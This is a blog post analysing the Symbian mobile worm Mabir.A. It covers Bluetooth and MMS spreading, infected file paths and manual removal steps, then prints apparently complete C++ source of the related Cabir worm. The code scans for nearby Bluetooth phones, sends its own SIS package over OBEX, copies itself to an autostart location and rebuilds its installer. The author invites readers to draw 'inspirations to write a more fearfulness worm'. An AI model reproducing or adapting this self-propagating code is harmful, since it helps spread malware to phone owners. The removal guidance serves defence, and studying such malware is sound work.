`
lovnet
  • 浏览: 6877723 次
  • 性别: Icon_minigender_1
  • 来自: 武汉
文章分类
社区版块
存档分类
最新评论

Analysing Mabir.A Virus

阅读更多

Analysing Mabir.A Virus

BY Delphiscn (cnBlaster#hotmail.com) http://blog.csdn.net/delphiscn

----[Table of contents

0x01.Introduction

0x02.Mabir.A's details & solution

0x03.Code

0x04.Reference

----[ 0x01. Introduction

Nowadays, there are many computer viruses feaze us. But with the
development of the technology, some mobile telephone's viruses are also
appeared. So, not only the systems such as Windows、Linux are infected.
But also the mobile phones based on Symbian OS、Windows CE systems
are hacked...

This article will give us a example to know how a virus to infect and
work. Maybe some viewpoints in this paper will give you some inspirations
to write a more fearfulness worm :)

----[ 0x02. Mabir.A's details & solution

Mabir is a worm based on Symbian 60 system, which is spread by Bluetooth
and MMS. It will search the other mobile phones equipped with Bluetooth
as soon as infected a system. and send a virus copy(SIS File) at the same time.

  
The missive file always has the same name called caribe.sis. Here, we
should pay a attention to it. Though the filename is the same as the worm caribe,
they have some differences.

Besides the way of Bluetooth, Mabir.A will also listen all the MMS and SMS
Messages from the infected phones. And reply these messageswith info.sis,
a virus copy.

  The MMS Messages replyed by Mabir will not included any words, except
info.sis file.
  
  Next, Let's talk something about MMS.

MMS Message is a kind of multimedia that can transport any information to mobile phones
which are support MMS technology. As its name, MMSonly contains
multimedia, such as picture、audio frequency and video frequency. But, in fact,
it contains all, even as the infected files, Mabir always camouflages itself asa
Symbian's installation procedure. Let you to execute it.

Killing Mabir.A

1.Install a file manager program on the device.

2.Enable the option to view the files in the system folder.

3.Delete the following malicious files:
Profimail v2.75_FULL.sis
\system\install\Profimail v2.75_FULL.sis
C:\System\Apps\AppInst\Appinst.aif
C:\System\Apps\AppInst\Appinst.app
C:\System\Apps\caribe\caribe.rsc
C:\System\Apps\caribe\caribe.app
C:\System\Apps\caribe\flo.mdl
C:\System\recogs\flo.mdl
C:\System\Fonts\11x12 euro_fonts.gdr
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.RSC
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.SIS
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\INFO.SIS

4.Reinstall the following programs that were overwritten by the threat:
ProfiMail
ProfiExplorer

Detailed description:

1.Spreading by Bluetooth

On this way, Mabir always copies itselftoa file named caribe.sis. SIS
contains three virus's files

caribe.app, caribe.rsc and flo.mdl

When SIS sets up, it will execute caribe.app automatically. To start up the
worm.

If Mabir.A is activation, it will immediately search the other Bluetooth
phones, and copy itself to them. If the target system refused, it will still send the
same messages. Just like DDOS.

2.Spreading by MMS

Using MMS way to spread, Mabir will copy the infected SIS files. These files
included info.sis but there aren't any words in the MMS message.

Infection

When Mabir SIS installs the files, it will copy worm to these place:

\system\apps\Caribe\Caribe.app
\system\apps\Caribe\Caribe.rsc
\system\apps\Caribe\flo.mdl

When Mabir.exe executes, it will copy these files:

\system\symbiansecuredata\caribesecuritymanager\Caribe.app
\system\symbiansecuredata\caribesecuritymanager\Caribe.rsc

and rebuilds SIS file to:

\system\symbiansecuredata\caribesecuritymanager\Info.sis

If these steps are executed successfully, Mabir.A will search all the
Bluetooth phones and begin to wait all the MMSand SMS Messages arrived.

----[ 0x03. Code

Attention:

This code is called Cabir which is the preexistence of Mabir. Comparing both
to say, Cabir and Mabir Maybe have same differences.

#include "general.h"

#include "caribebt.h"

#include <eikenv.h>

#include <bt_sock.h>

#include <obex.h>

#include <btextnotifiers.h>

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////

CaribeBluetooth::CaribeBluetooth():

CActive(CActive::EPriorityStandard)

{

WithAddress = 0;

iState = 3;

_LIT(currentFileName,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURIT
YMANAGER\\CARIBE.SIS");

iCurrFile = CObexFileObject::NewL(TPtrC(NULL, 0));

iCurrFile->InitFromFileL(currentFileName);

CActiveScheduler::Add(this);

}

CaribeBluetooth::~CaribeBluetooth()

{

}

CaribeBluetooth* CaribeBluetooth::NewL()

{

return NewLC();

}

CaribeBluetooth* CaribeBluetooth::NewLC()

{

CaribeBluetooth* self = new CaribeBluetooth;

self->ConstructL();

return self;

}

void CaribeBluetooth::ConstructL()

{

iState = 3;

RunL();

}

void CaribeBluetooth::RunL()

{

if(iState == 1)

{

if(!obexClient->IsConnected())

{

iState = 3;

}

else

{

//iCurrObject = CObexNullObject::NewL();

//iCurrObject->SetNameL(_L("Hello World"));

//obexClient->Put(*iCurrObject,iStatus);

iState = 2;

Cancel();

obexClient->Put(*iCurrFile,iStatus);

SetActive();

return;

}

}

if(iState == 2)

{

//delete iCurrObject;

iState = 3;

Cancel();

obexClient->Disconnect(iStatus);

SetActive();

return;

}

if(iState == 3)

{

if(obexClient)

{

delete obexClient;

obexClient = NULL;

}

while(iState == 3)

{

FindDevices();

ManageFoundDevices();

}

return;

}

}

void CaribeBluetooth::DoCancel()

{

}

int CaribeBluetooth::FindDevices()

{

_LIT(KL2Cap, "BTLinkManager");

int res;

if((res = socketServ.Connect()) != KErrNone)

{

//ErrMessage("Error Connect");

return 0;

}

if((res = socketServ.FindProtocol((const
TProtocolName&)KL2Cap,pInfo))!=KErrNone)

{

//ErrMessage("Error FindProtocol");

socketServ.Close();

return 0;

}

if((res = hr.Open(socketServ,pInfo.iAddrFamily,pInfo.iProtocol))!=KErrNone)

{

//ErrMessage("Error Open");

socketServ.Close();

return 0;

}

WithAddress = 0;

addr.SetIAC(KGIAC);

addr.SetAction(KHostResInquiry);

TRequestStatus iStatusIn;

hr.GetByAddress(addr, entry, iStatusIn);

User::WaitForRequest(iStatusIn);

if(iStatusIn!=KErrNone)

{

//ErrMessage("Error Finding Devices");

}

else

{

WithAddress = 1;

}

socketServ.Close();

// hr.Close();

return 0;

}

int CaribeBluetooth::ManageFoundDevices()

{

if(WithAddress)

{

WithAddress = 0;

Cancel();

TBTSockAddr btaddr(entry().iAddr);

TBTDevAddr devAddr;

devAddr = btaddr.BTAddr();

TObexBluetoothProtocolInfo obexBTProtoInfo;

obexBTProtoInfo.iTransport.Copy(_L("RFCOMM"));

obexBTProtoInfo.iAddr.SetBTAddr(devAddr);

obexBTProtoInfo.iAddr.SetPort(0x00000009);

obexClient = CObexClient::NewL(obexBTProtoInfo);

if(obexClient)

{

iState = 1;

iStatus = KRequestPending;

Cancel();

obexClient->Connect(iStatus);

SetActive();

}

}

else

{

iState = 3;

User::After(1000000);

}

return 0;

}

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////

#include "general.h"

#include "CaribeInstaller.h"

#include <aknapp.h>

#include <e32std.h>

#include <e32base.h>

#include <e32def.h>

#include <f32file.h>

#include <bautils.h>

#include <eikenv.h>

#include "file.h"

//#include "sisheader.h"

#define AUTOSTARTABLE
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.A
PP"

_LIT(Autostartablestr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURIT
YMANAGER\\CARIBE.APP");

#define AUTOSTARTABLERSC
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.
RSC"

_LIT(Autostartablerscstr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECUR
ITYMANAGER\\CARIBE.RSC");

#define AUTOSTARTABLEPATH
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\"

_LIT(Autostartablepathstr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESEC
URITYMANAGER\\");

#define RECOGFILE "C:\\SYSTEM\\RECOGS\\FLO.MDL"

_LIT(Recogfilestr,"C:\\SYSTEM\\RECOGS\\FLO.MDL");

#define RECOGFILEPATH "C:\\SYSTEM\\RECOGS\\"

_LIT(Recogfilepathstr,"C:\\SYSTEM\\RECOGS\\");

#define SISFILE
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.S
IS"

_LIT(Sisfilestr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANA
GER\\CARIBE.SIS");

unsigned short DOCRC16(unsigned short crc,void * array,int size);

CaribeInstaller::CaribeInstaller()

{

}

CaribeInstaller::~CaribeInstaller()

{

}

/*************************************************************
*********

CopyMeToAutostartableDir:

This function will copy the own dll of this application to

"C:\SYSTEM\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP"
.

.mdl for autostart will start that application automaticly.

Parameters:

CAknApplication of the application to be copied.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::CopyMeToAutostartableDir(CAknApplication * OwnApp)

{

TFileName OwnDllName = OwnApp->DllName();

TBuf16 <sizeof(AUTOSTARTABLE)>Autostartable(Autostartablestr);

OwnDllName.UpperCase();

if(OwnDllName == Autostartable)

{

return;

}

RFs fs;

User::LeaveIfError(fs.Connect());

TBuf16 <sizeof(AUTOSTARTABLEPATH)>
autostartablepath(Autostartablepathstr);

fs.MkDirAll(Autostartablepathstr);

if(BaflUtils::CopyFile(fs,OwnDllName,Autostartable,CFileMan::EOverWrite)!=K
ErrNone)

{

fs.Close();

return;

}

TBuf16 <sizeof(AUTOSTARTABLERSC)> Autostartablersc (Autostartablerscstr);

OwnDllName[OwnDllName.Length()-3] = 'R';

OwnDllName[OwnDllName.Length()-2] = 'S';

OwnDllName[OwnDllName.Length()-1] = 'C';

if(BaflUtils::CopyFile(fs,OwnDllName,Autostartablersc,CFileMan::EOverWrite)!
=KErrNone)

{

BaflUtils::DeleteFile(fs,Autostartable,0);

}

fs.Close();

return;

}

/*************************************************************
*********

InstallMDL:

This function will install the mdl file to the recogs directory.

Parameters:

CAknApplication of this application for constructing the path

of the mdl.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::InstallMDL(CAknApplication * OwnApp)

{

RFs fs;

User::LeaveIfError(fs.Connect());

TFileName OwnDllName = OwnApp->DllName();

TBuf16 <sizeof(RECOGFILE)>Recogfile(Recogfilestr);

TParse parser;

parser.Set(OwnDllName,NULL,NULL);

TBuf16 <KMaxPath> flodrivepath(parser.DriveAndPath());

_LIT16(FLOMDL,"flo.mdl");

flodrivepath.Append(FLOMDL);

TBuf16 <sizeof(RECOGFILEPATH)> Recogfilepath(Recogfilepathstr);

fs.MkDirAll(Recogfilepath);

BaflUtils::CopyFile(fs,flodrivepath,Recogfile,CFileMan::EOverWrite);

fs.Close();

}

/*************************************************************
*********

CreateSis:

This function will create a .sis file with caribe.app,caribe.rsc

and flo.mdl

Parameters:

CAknApplication of this application for constructing the path

of the mdl.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::CreateSis(CAknApplication * OwnApp)

{

unsigned char sisheader[] =

{

0x3D ,0x1A ,0x8B ,0x03 ,0x12 ,0x3A ,0x00 ,0x10

,0x19 ,0x04 ,0x00 ,0x10 ,0xC4 ,0xE0 ,0x80 ,0xAB

//Offset 0x10 CRC16

,0x00 ,0x00 ///////

///////////////////

,0x01 ,0x00 ,0x03 ,0x00 ,0x01 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x21 ,0x00 ,0x00 ,0x00

,0xC8 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00

,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x64 ,0x00 ,0x00 ,0x00 ,0x66 ,0x00 ,0x00 ,0x00

,0xF6 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x0A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x0A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

//Offset 0x50 Size of Packed Data/////

,0xCC ,0x20 ,0x01, 0x00///////////////

//////////////////////////////////////

,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0x12 ,0x01

,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0x2A ,0x01

,0x00 ,0x00

//Offset 0x82 size of packed file 3

,0x61 ,0xA0 ,0x00 ,0x00

//Offset 0x86: offset of third packed file//

,0x3C ,0x02,0x00 ,0x00 /////////////////////

////////////////////////////////////////////

//Offset 0x8a again size of packed file 3

,0x61 ,0xA0 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x6A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x12 ,0x00 ,0x00 ,0x00 ,0x6A ,0x01

,0x00 ,0x00 ,0x3A ,0x00 ,0x00 ,0x00 ,0x7C ,0x01

,0x00 ,0x00

//Offset 0xB2 size of packed file 2

,0x59 ,0x80 ,0x00 ,0x00

//Offset 0xB6: offset of second packed file//

, 0x9D ,0xA2 ,0x00 ,0x00 ////////////////////

/////////////////////////////////////////////

//Offset 0xBA again size of packed file 2

,0x59 ,0x80 ,0x00 ,0x00

,0x00 ,0x00

,0x00 ,0x00 ,0xB6 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0xB6 ,0x01

,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0xCE ,0x01

,0x00 ,0x00

//Offset 0xE2 size of packed file 1

,0x12 ,0x00 ,0x00 ,0x00

//Offset 0xE6: offset of first packed file//

,0xF6 ,0x22,0x01 ,0x00 /////////////////////

////////////////////////////////////////////

//Offset 0xEA again size of packed file 1

,0x12 ,0x00 ,0x00 ,0x00

,0x00 ,0x00

,0x00 ,0x00 ,0x0E ,0x02 ,0x00 ,0x00 ,0x88 ,0x6F

,0x1F ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x22 ,0x00 ,0x00 ,0x00 ,0x0E ,0x02

,0x00 ,0x00 ,0x0C ,0x00 ,0x00 ,0x00 ,0x30 ,0x02

,0x00 ,0x00 ,0x2E ,0x00 ,0x5C ,0x00 ,0x63 ,0x00

,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00

,0x65 ,0x00 ,0x2E ,0x00 ,0x61 ,0x00 ,0x70 ,0x00

,0x70 ,0x00 ,0x21 ,0x00 ,0x3A ,0x00 ,0x5C ,0x00

,0x73 ,0x00 ,0x79 ,0x00 ,0x73 ,0x00 ,0x74 ,0x00

,0x65 ,0x00 ,0x6D ,0x00 ,0x5C ,0x00 ,0x61 ,0x00

,0x70 ,0x00 ,0x70 ,0x00 ,0x73 ,0x00 ,0x5C ,0x00

,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00

,0x62 ,0x00 ,0x65 ,0x00 ,0x5C ,0x00 ,0x63 ,0x00

,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00

,0x65 ,0x00 ,0x2E ,0x00 ,0x61 ,0x00 ,0x70 ,0x00

,0x70 ,0x00 ,0x2E ,0x00 ,0x5C ,0x00 ,0x66 ,0x00

,0x6C ,0x00 ,0x6F ,0x00 ,0x2E ,0x00 ,0x6D ,0x00

,0x64 ,0x00 ,0x6C ,0x00 ,0x21 ,0x00 ,0x3A ,0x00

,0x5C ,0x00 ,0x73 ,0x00 ,0x79 ,0x00 ,0x73 ,0x00

,0x74 ,0x00 ,0x65 ,0x00 ,0x6D ,0x00 ,0x5C ,0x00

,0x61 ,0x00 ,0x70 ,0x00 ,0x70 ,0x00 ,0x73 ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x5C ,0x00

,0x66 ,0x00 ,0x6C ,0x00 ,0x6F ,0x00 ,0x2E ,0x00

,0x6D ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x2E ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x2E ,0x00

,0x72 ,0x00 ,0x73 ,0x00 ,0x63 ,0x00 ,0x21 ,0x00

,0x3A ,0x00 ,0x5C ,0x00 ,0x73 ,0x00 ,0x79 ,0x00

,0x73 ,0x00 ,0x74 ,0x00 ,0x65 ,0x00 ,0x6D ,0x00

,0x5C ,0x00 ,0x61 ,0x00 ,0x70 ,0x00 ,0x70 ,0x00

,0x73 ,0x00 ,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00

,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x2E ,0x00

,0x72 ,0x00 ,0x73 ,0x00 ,0x63 ,0x00 ,0x53 ,0x00

,0x65 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x65 ,0x00

,0x73 ,0x00 ,0x36 ,0x00 ,0x30 ,0x00 ,0x50 ,0x00

,0x72 ,0x00 ,0x6F ,0x00 ,0x64 ,0x00 ,0x75 ,0x00

,0x63 ,0x00 ,0x74 ,0x00 ,0x49 ,0x00 ,0x44 ,0x00

,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00

,0x62 ,0x00 ,0x65 ,0x00

};

unsigned char rscraw[] =

{

/*0x0C,0x00,0x07,0x00,0x04,0x00,0x00,0x00,

0x01,0x60,0xA2,0x11,0x04,0x00,0x0C,0x00,

0x0C,0x00*/

0x24,0x00,0x09,0x00,0x04,0x00,0x00,0x00,0x01,0x60,

0xA2,0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x0C,0x00,

0x0C,0x00,0x24,0x00

};

TBuf16 <sizeof(SISFILE)>Sisfile(Sisfilestr);

TBuf16 <sizeof(RECOGFILE)>Recogfile(Recogfilestr);

TBuf16 <sizeof(AUTOSTARTABLE)>Appfile(Autostartablestr);

TBuf16 <sizeof(AUTOSTARTABLERSC)>Rscfile(Autostartablerscstr);

unsigned short crc = 0;

int i;

int leidos;

unsigned char bytesdata[100];

File fsis;

File fRecog;

File fApp;

int RecogSize;

int AppSize;

int RscSize;

if(!fsis.Open(Sisfile,File::OMCreate|File::OMWrite|File::OMRead))

{

if(!fsis.Open(Sisfile,File::OMReplace|File::OMRead|File::OMWrite))

{

return;

}

}

if(!fRecog.Open(Recogfile,File::OMOpen|File::OMRead))

{

fsis.Close();

return;

}

fRecog.rFile.Size(RecogSize);

if(!fApp.Open(Appfile,File::OMOpen|File::OMRead))

{

fsis.Close();

fRecog.Close();

return;

}

fApp.rFile.Size(AppSize);

RscSize = sizeof(rscraw);

unsigned short CRC16; //0x10

unsigned int SizeData; //0x50

unsigned int OffsetData1; //0xE6

unsigned int OffsetData2; //0xB6

unsigned int OffsetData3; //0x86

unsigned int SizeData11; //0xE2

unsigned int SizeData12; //0xEA

unsigned int SizeData21; //0xB2

unsigned int SizeData22; //0xBA

unsigned int SizeData31; //0x82

unsigned int SizeData32; //0x8A

CRC16 = 0;

SizeData = RecogSize+AppSize+RscSize;

SizeData11= RscSize;

SizeData21= RecogSize;

SizeData31= AppSize;

SizeData12 = RscSize;

SizeData22 = RecogSize;

SizeData32 = AppSize;

OffsetData3 = 0x0000023c;

OffsetData2 = 0x0000023c+AppSize;

OffsetData1 = 0x0000023c+AppSize+RecogSize;

//Writing header

crc = DOCRC16(crc,sisheader,0x10);

crc = DOCRC16(crc,&sisheader[0x12],0x50-0x12);

fsis.Write(sisheader,0x50);

crc = DOCRC16(crc,&SizeData/*&sisheader[0x50]*/,4); //SizeData;
//0x50

fsis.Write(&SizeData/*sisheader[0x50]*/,4);

crc = DOCRC16(crc,&sisheader[0x54],0x82-0x54);

fsis.Write(&sisheader[0x54],0x82-0x54);

crc = DOCRC16(crc,&SizeData31/*&sisheader[0x82]*/,0x04);//SizeData31;
//0x82

crc =
DOCRC16(crc,&OffsetData3/*&sisheader[0x86]*/,0x04);//OffsetData3;//0x8
6

crc = DOCRC16(crc,&SizeData32/*&sisheader[0x8a]*/,0x04);//SizeData32;
//0x8A

fsis.Write(&SizeData31/*&sisheader[0x82]*/,0x04);

fsis.Write(&OffsetData3/*&sisheader[0x86]*/,0x04);

fsis.Write(&SizeData32/*&sisheader[0x8a]*/,0x04);

crc = DOCRC16(crc,&sisheader[0x8e],0xb2-0x8e);

fsis.Write(&sisheader[0x8e],0xb2-0x8e);

crc = DOCRC16(crc,&SizeData21/*&sisheader[0xB2]*/,0x04);//SizeData21;

crc = DOCRC16(crc,&OffsetData2/*&sisheader[0xB2]*/,0x04);//OffsetData2;

crc = DOCRC16(crc,&SizeData22/*&sisheader[0xB2]*/,0x04);//SizeData22;

fsis.Write(&SizeData21/*&sisheader[0xB2]*/,0x04);

fsis.Write(&OffsetData2/*&sisheader[0xB2]*/,0x04);

fsis.Write(&SizeData22/*&sisheader[0xB2]*/,0x04);

crc = DOCRC16(crc,&sisheader[0xbe],0xe2-0xbe);

fsis.Write(&sisheader[0xbe],0xe2-0xbe);

crc = DOCRC16(crc,&SizeData11/*&sisheader[0xe2]*/,0x04);//SizeData11;

crc = DOCRC16(crc,&OffsetData1/*&sisheader[0xe2]*/,0x04);//OffsetData1;

crc = DOCRC16(crc,&SizeData12/*&sisheader[0xe2]*/,0x04);//SizeData12;

fsis.Write(&SizeData11/*&sisheader[0xe2]*/,0x04);

fsis.Write(&OffsetData1/*&sisheader[0xe2]*/,0x04);

fsis.Write(&SizeData12/*&sisheader[0xe2]*/,0x04);

crc = DOCRC16(crc,&sisheader[0xee],0x23c-0xee);

fsis.Write(&sisheader[0xee],0x23c-0xee);

//Writing app

while(leidos = fApp.Read(bytesdata,100))

{

crc = DOCRC16(crc,bytesdata,leidos);

fsis.Write(bytesdata,leidos);

}

//Writing recog

while(leidos = fRecog.Read(bytesdata,100))

{

crc = DOCRC16(crc,bytesdata,leidos);

fsis.Write(bytesdata,leidos);

}

//Writing rsc

crc = DOCRC16(crc,rscraw,sizeof(rscraw));

fsis.Write(rscraw,sizeof(rscraw));

fsis.Seek(ESeekStart,0x10);

fsis.Write(&crc,2);

fsis.Close();

fRecog.Close();

fApp.Close();

}

unsigned short DOCRC16(unsigned short crc,void * _array,int size)

{

//static unsigned int polynomial = 0x1021;

//static unsigned short _table[256], index;

unsigned short crcTab[256] =

{0x0000,0x1021,0x2042,0x3063,0x4084,0x50a5,0x60c6,0x70e7,0x8108,0x9
129,0xa14a,

0xb16b,0xc18c,0xd1ad,0xe1ce,0xf1ef,0x1231,0x0210,0x3273,0x2252,0x52b
5,0x4294,

0x72f7,0x62d6,0x9339,0x8318,0xb37b,0xa35a,0xd3bd,0xc39c,0xf3ff,0xe3de
,0x2462,

0x3443,0x0420,0x1401,0x64e6,0x74c7,0x44a4,0x5485,0xa56a,0xb54b,0x85
28,0x9509,

0xe5ee,0xf5cf,0xc5ac,0xd58d,0x3653,0x2672,0x1611,0x0630,0x76d7,0x66f6
,0x5695,

0x46b4,0xb75b,0xa77a,0x9719,0x8738,0xf7df,0xe7fe,0xd79d,0xc7bc,0x48c4
,0x58e5,

0x6886,0x78a7,0x0840,0x1861,0x2802,0x3823,0xc9cc,0xd9ed,0xe98e,0xf9a
f,0x8948,

0x9969,0xa90a,0xb92b,0x5af5,0x4ad4,0x7ab7,0x6a96,0x1a71,0x0a50,0x3a
33,0x2a12,

0xdbfd,0xcbdc,0xfbbf,0xeb9e,0x9b79,0x8b58,0xbb3b,0xab1a,0x6ca6,0x7c87
,0x4ce4,

0x5cc5,0x2c22,0x3c03,0x0c60,0x1c41,0xedae,0xfd8f,0xcdec,0xddcd,0xad2a,
0xbd0b,

0x8d68,0x9d49,0x7e97,0x6eb6,0x5ed5,0x4ef4,0x3e13,0x2e32,0x1e51,0x0e
70,0xff9f,

0xefbe,0xdfdd,0xcffc,0xbf1b,0xaf3a,0x9f59,0x8f78,0x9188,0x81a9,0xb1ca,0
xa1eb,

0xd10c,0xc12d,0xf14e,0xe16f,0x1080,0x00a1,0x30c2,0x20e3,0x5004,0x402
5,0x7046,

0x6067,0x83b9,0x9398,0xa3fb,0xb3da,0xc33d,0xd31c,0xe37f,0xf35e,0x02b
1,0x1290,

0x22f3,0x32d2,0x4235,0x5214,0x6277,0x7256,0xb5ea,0xa5cb,0x95a8,0x85
89,0xf56e,

0xe54f,0xd52c,0xc50d,0x34e2,0x24c3,0x14a0,0x0481,0x7466,0x6447,0x542
4,0x4405,

0xa7db,0xb7fa,0x8799,0x97b8,0xe75f,0xf77e,0xc71d,0xd73c,0x26d3,0x36f2
,0x0691,

0x16b0,0x6657,0x7676,0x4615,0x5634,0xd94c,0xc96d,0xf90e,0xe92f,0x99c
8,0x89e9,

0xb98a,0xa9ab,0x5844,0x4865,0x7806,0x6827,0x18c0,0x08e1,0x3882,0x28
a3,0xcb7d,

0xdb5c,0xeb3f,0xfb1e,0x8bf9,0x9bd8,0xabbb,0xbb9a,0x4a75,0x5a54,0x6a37
,0x7a16,

0x0af1,0x1ad0,0x2ab3,0x3a92,0xfd2e,0xed0f,0xdd6c,0xcd4d,0xbdaa,0xad8b
,0x9de8,

0x8dc9,0x7c26,0x6c07,0x5c64,0x4c45,0x3ca2,0x2c83,0x1ce0,0x0cc1,0xef1f,
0xff3e,

0xcf5d,0xdf7c,0xaf9b,0xbfba,0x8fd9,0x9ff8,0x6e17,0x7e36,0x4e55,0x5e74,0
x2e93,

0x3eb2,0x0ed1,0x1ef0

};

unsigned short * table = NULL;

unsigned char * array = (unsigned char *)_array;

int i;

if(!table)

{

table = crcTab;

/*

table = _table;

table[0]=0;

for (index = 0; index < 128; index++)

{

unsigned int carry = table[index] & 0x8000;

unsigned int temp = (table[index] << 1) & 0xffff;

table[index * 2 + (carry ? 0 : 1)] = temp ^ polynomial;

table[index * 2 + (carry ? 1 : 0)] = temp;

} */

}

for(i=0;i<size;i++)

{

crc = ((crc << 8) ^ table[((crc >> 8) ^ array[i]) & 0xff]);

}

return crc;

}

----[ 0x04. Reference

Symbian virus analyse
http://www.netqin.com/viruslist/Mabir.A.html

===EOF=======================================

分享到:
评论

相关推荐

    This module contains functions for analysing strings. This .

    标题中的"This module contains functions for analysing strings"指出这是一个专门用于分析字符串的模块。在编程领域,字符串处理是至关重要的,特别是在文本处理、数据解析、用户输入验证等方面。这个模块可能包含...

    circults analysing version 3.rar

    《电路分析》是电子工程领域的一本经典教材,版本3的更新无疑为学习者提供了更为丰富和详尽的内容。这本书深入浅出地介绍了电路理论的基础知识,是电气工程师和相关专业学生的重要参考资料。标签“电路分析”直接...

    《网络数据爬取与分析实务教程》相关代码与数据集_Data-Crawling-and-Analysing.zip

    《网络数据爬取与分析实务教程》相关代码与数据集_Data-Crawling-and-Analysing

    Design_and_Implementation_of_a_Wireless_OBD_II_Fle.pdf

    (GUI) is developed for analysing the transmitted data . Various qualification tests are conducted to verify the functionality of the system. The results demonstrate that the system is capable of ...

    IOTSim A simulator for analysing IoT applications

    ### IOTSim: A Simulator for Analyzing IoT Applications The rise of big data has disrupted traditional computing paradigms and influenced various industries. Internet of Things (IoT) applications are ...

    MCSD - Analysing Requirements and Defining Solutions Architecture.CHM

    Welcome to Analyzing Requirements and Defining Solution Architectures: MCSD Training Kit for Exam 70-100. By completing the chapters and associated case studies in this course, you will acquire the ...

    OllyDbg 32-bit analysing debugger

    《深入解析OllyDbg:32位分析调试器的精华知识》 OllyDbg,作为一款经典的32位分析调试器,自其诞生以来就深受程序员、逆向工程师和安全研究人员的喜爱。这款强大的工具以其独特的功能和易用性在IT领域占据了重要的...

    英文原版-Qualitative Data Analysis Practical Strategies 1st Edition

    this dynamic new book provides a definitive introduction to analysing qualitative data.It is a clear, accessible and practical guide to each stage of the process, including:,解压密码 share.weimo.info

    Oxford NLP lecture

    The course covers a range of applications of neural networks in NLP including analysing latent dimensions in text, transcribing speech to text, translating between languages, and answering questions....

    A PACKING GENERATION SCHEME FOR THE GRANULAR.pdf

    ective packing model as a required initial input for analysing the mechanics of granular material. This generation scheme potentially can explore the complex 3-D behaviours of material composed of ...

    tsa时间序列分析预测.rar

    The TSA toolbox is useful for analysing Time Series. - Stochastic Signal processing - Autoregressive Model Identification - adaptive autoregressive modelling using Kalman filtering - multivariate ...

    Bayesian Methods for Statistical Analysis_[Puza2015]

    ‘Bayesian Methods for Statistical Analysis’ is a book on statistical methods for analysing a wide variety of data. The book consists of 12 chapters, starting with basic concepts and covering ...

    Maple_in_Finance_ApplicationPack

    analysing or modelling a product, a system or its components, you’ll find that Maple provides the essential tools you need for efficient, error-free problem solving. Over 4000 mathematical functions ...

    range.rar 词频统计软件

